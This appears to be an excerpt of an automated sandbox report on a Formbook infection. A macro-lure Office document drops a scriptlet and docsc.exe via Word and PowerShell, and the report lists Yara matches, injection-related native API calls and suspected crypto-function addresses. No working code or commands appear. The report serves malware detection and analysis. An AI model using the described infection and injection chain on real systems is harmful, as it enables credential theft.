Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 539 N@m 13 ;a 10096 G) FI G) ,, =1'L'm')
Source: Screenshot number: 8 Screenshot OCR: Enable Editing when opening. O "g"' 0' ' I Wo"" "' I '3 I _ 1@ 13 '00% G) A GE) a 0 m
Source: Screenshot number: 12 Screenshot OCR: Enable Editing when opening. ii: ^ . . . . . 's . . . . .layer . . . . . . a"t , au'qj . . . ,.
Found suspicious RTF objects
Source: AbctfhgXgdghgh.ScT Static RTF information: Object: 0 Offset: 00007110h AbctfhgXgdghgh.ScT
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
PE file contains section with special chars
Source: docsc[1].exe.0.dr Static PE information: section name: U#j;F_`
Source: docsc.exe.3.dr Static PE information: section name: U#j;F_`
PE file has nameless sections
Source: docsc[1].exe.0.dr Static PE information: section name:
Source: docsc.exe.3.dr Static PE information: section name:
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\docsc.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\docsc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004181C0 NtCreateFile, 12_2_004181C0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00418270 NtReadFile, 12_2_00418270
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004182F0 NtClose, 12_2_004182F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004183A0 NtAllocateVirtualMemory, 12_2_004183A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041826A NtReadFile, 12_2_0041826A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041839A NtAllocateVirtualMemory, 12_2_0041839A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730078 NtResumeThread,LdrInitializeThunk, 12_2_00730078
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_00730048
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007300C4 NtCreateFile,LdrInitializeThunk, 12_2_007300C4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007307AC NtCreateMutant,LdrInitializeThunk, 12_2_007307AC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F900 NtReadFile,LdrInitializeThunk, 12_2_0072F900
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F9F0 NtClose,LdrInitializeThunk, 12_2_0072F9F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_0072FAE8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_0072FAD0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_0072FB68
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk, 12_2_0072FBB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk, 12_2_0072FC60
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_0072FC90
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_0072FDC0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FD8C NtDelayExecution,LdrInitializeThunk, 12_2_0072FD8C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_0072FED0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk, 12_2_0072FEA0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FFB4 NtCreateSection,LdrInitializeThunk, 12_2_0072FFB4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730060 NtQuerySection, 12_2_00730060
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007310D0 NtOpenProcessToken, 12_2_007310D0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731148 NtOpenThread, 12_2_00731148
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073010C NtOpenDirectoryObject, 12_2_0073010C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007301D4 NtSetValueKey, 12_2_007301D4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F8CC NtWaitForSingleObject, 12_2_0072F8CC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731930 NtSetContextThread, 12_2_00731930
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072F938 NtWriteFile, 12_2_0072F938
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FA50 NtEnumerateValueKey, 12_2_0072FA50
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FA20 NtQueryInformationFile, 12_2_0072FA20
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FAB8 NtQueryValueKey, 12_2_0072FAB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FB50 NtCreateKey, 12_2_0072FB50
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FBE8 NtQueryVirtualMemory, 12_2_0072FBE8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00730C40 NtGetContextThread, 12_2_00730C40
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC48 NtSetInformationFile, 12_2_0072FC48
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FC30 NtOpenProcess, 12_2_0072FC30
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FD5C NtEnumerateKey, 12_2_0072FD5C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00731D80 NtSuspendThread, 12_2_00731D80
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FE24 NtWriteVirtualMemory, 12_2_0072FE24
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FF34 NtQueueApcThread, 12_2_0072FF34
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0072FFFC NtCreateProcessEx, 12_2_0072FFFC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 12_2_002767C7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C2 NtQueryInformationProcess, 12_2_002767C2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A00C4 NtCreateFile,LdrInitializeThunk, 14_2_020A00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A07AC NtCreateMutant,LdrInitializeThunk, 14_2_020A07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAB8 NtQueryValueKey,LdrInitializeThunk, 14_2_0209FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_0209FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FAE8 NtQueryInformationProcess,LdrInitializeThunk, 14_2_0209FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FB50 NtCreateKey,LdrInitializeThunk, 14_2_0209FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FB68 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_0209FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FBB8 NtQueryInformationToken,LdrInitializeThunk, 14_2_0209FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F900 NtReadFile,LdrInitializeThunk, 14_2_0209F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F9F0 NtClose,LdrInitializeThunk, 14_2_0209F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_0209FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FFB4 NtCreateSection,LdrInitializeThunk, 14_2_0209FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC60 NtMapViewOfSection,LdrInitializeThunk, 14_2_0209FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FD8C NtDelayExecution,LdrInitializeThunk, 14_2_0209FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FDC0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_0209FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0048 NtProtectVirtualMemory, 14_2_020A0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0060 NtQuerySection, 14_2_020A0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0078 NtResumeThread, 14_2_020A0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A10D0 NtOpenProcessToken, 14_2_020A10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A010C NtOpenDirectoryObject, 14_2_020A010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1148 NtOpenThread, 14_2_020A1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A01D4 NtSetValueKey, 14_2_020A01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FA20 NtQueryInformationFile, 14_2_0209FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FA50 NtEnumerateValueKey, 14_2_0209FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FBE8 NtQueryVirtualMemory, 14_2_0209FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F8CC NtWaitForSingleObject, 14_2_0209F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209F938 NtWriteFile, 14_2_0209F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1930 NtSetContextThread, 14_2_020A1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FE24 NtWriteVirtualMemory, 14_2_0209FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FEA0 NtReadVirtualMemory, 14_2_0209FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FF34 NtQueueApcThread, 14_2_0209FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FFFC NtCreateProcessEx, 14_2_0209FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC30 NtOpenProcess, 14_2_0209FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC48 NtSetInformationFile, 14_2_0209FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A0C40 NtGetContextThread, 14_2_020A0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FC90 NtUnmapViewOfSection, 14_2_0209FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0209FD5C NtEnumerateKey, 14_2_0209FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020A1D80 NtSuspendThread, 14_2_020A1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000981C0 NtCreateFile, 14_2_000981C0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_00098270 NtReadFile, 14_2_00098270
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000982F0 NtClose, 14_2_000982F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000983A0 NtAllocateVirtualMemory, 14_2_000983A0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009826A NtReadFile, 14_2_0009826A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009839A NtAllocateVirtualMemory, 14_2_0009839A
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D2450 10_2_001D2450
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6C78 10_2_001D6C78
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D1881 10_2_001D1881
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D2CCA 10_2_001D2CCA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D04E2 10_2_001D04E2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D4590 10_2_001D4590
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DC1B0 10_2_001DC1B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DB1A8 10_2_001DB1A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D36B0 10_2_001D36B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5410 10_2_001D5410
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6830 10_2_001D6830
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6821 10_2_001D6821
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5420 10_2_001D5420
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D4466 10_2_001D4466
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D44A0 10_2_001D44A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DA1B0 10_2_001DA1B0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5210 10_2_001D5210
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6610 10_2_001D6610
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6601 10_2_001D6601
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DD268 10_2_001DD268
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001DCE68 10_2_001DCE68
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6A98 10_2_001D6A98
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D6AA8 10_2_001D6AA8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D76DA 10_2_001D76DA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_001D5FA0 10_2_001D5FA0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431170 10_2_00431170
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431B58 10_2_00431B58
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004344C8 10_2_004344C8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00436550 10_2_00436550
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00434D21 10_2_00434D21
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004316B8 10_2_004316B8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430740 10_2_00430740
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00435740 10_2_00435740
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430048 10_2_00430048
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004388C8 10_2_004388C8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004338A8 10_2_004338A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004372A0 10_2_004372A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431B48 10_2_00431B48
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438B58 10_2_00438B58
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043DC28 10_2_0043DC28
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043EC28 10_2_0043EC28
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438CF8 10_2_00438CF8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00431491 10_2_00431491
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00437498 10_2_00437498
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004314A0 10_2_004314A0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004386A8 10_2_004386A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004316A8 10_2_004316A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00430730 10_2_00430730
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_0043D780 10_2_0043D780
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661750 10_2_00661750
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00662EB8 10_2_00662EB8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661968 10_2_00661968
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661956 10_2_00661956
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661350 10_2_00661350
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_006613B6 10_2_006613B6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00661983 10_2_00661983
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00401030 12_2_00401030
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C273 12_2_0041C273
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BAA2 12_2_0041BAA2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00408C5B 12_2_00408C5B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BC22 12_2_0041BC22
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041CC24 12_2_0041CC24
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B4A6 12_2_0041B4A6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BD4F 12_2_0041BD4F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C501 12_2_0041C501
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402D87 12_2_00402D87
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402D90 12_2_00402D90
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BDBD 12_2_0041BDBD
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041BF3C 12_2_0041BF3C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041C7A5 12_2_0041C7A5
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00402FB0 12_2_00402FB0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075905A 12_2_0075905A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00743040 12_2_00743040
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076D005 12_2_0076D005
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073E0C6 12_2_0073E0C6
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E1238 12_2_007E1238
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073E2E9 12_2_0073E2E9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0078A37B 12_2_0078A37B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00747353 12_2_00747353
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00742305 12_2_00742305
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007663DB 12_2_007663DB
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073F3CF 12_2_0073F3CF
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0077D47D 12_2_0077D47D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00775485 12_2_00775485
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00751489 12_2_00751489
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00786540 12_2_00786540
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074351F 12_2_0074351F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075C5F0 12_2_0075C5F0
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E2622 12_2_007E2622
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074E6C1 12_2_0074E6C1
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00744680 12_2_00744680
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007757C3 12_2_007757C3
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074C7BC 12_2_0074C7BC
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007C579A 12_2_007C579A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076286D 12_2_0076286D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074C85C 12_2_0074C85C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007DF8EE 12_2_007DF8EE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007C5955 12_2_007C5955
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007569FE 12_2_007569FE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007429B2 12_2_007429B2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007E098E 12_2_007E098E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007F3A83 12_2_007F3A83
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00767B00 12_2_00767B00
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073FBD7 12_2_0073FBD7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007CDBDA 12_2_007CDBDA
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007ECBA4 12_2_007ECBA4
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0074CD5B 12_2_0074CD5B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00770D3B 12_2_00770D3B
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_007DFDDD 12_2_007DFDDD
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0075EE4C 12_2_0075EE4C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00772E2F 12_2_00772E2F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0076DF7C 12_2_0076DF7C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00750F3F 12_2_00750F3F
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002767C7 12_2_002767C7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00275062 12_2_00275062
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002708F9 12_2_002708F9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00270902 12_2_00270902
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_002732FF 12_2_002732FF
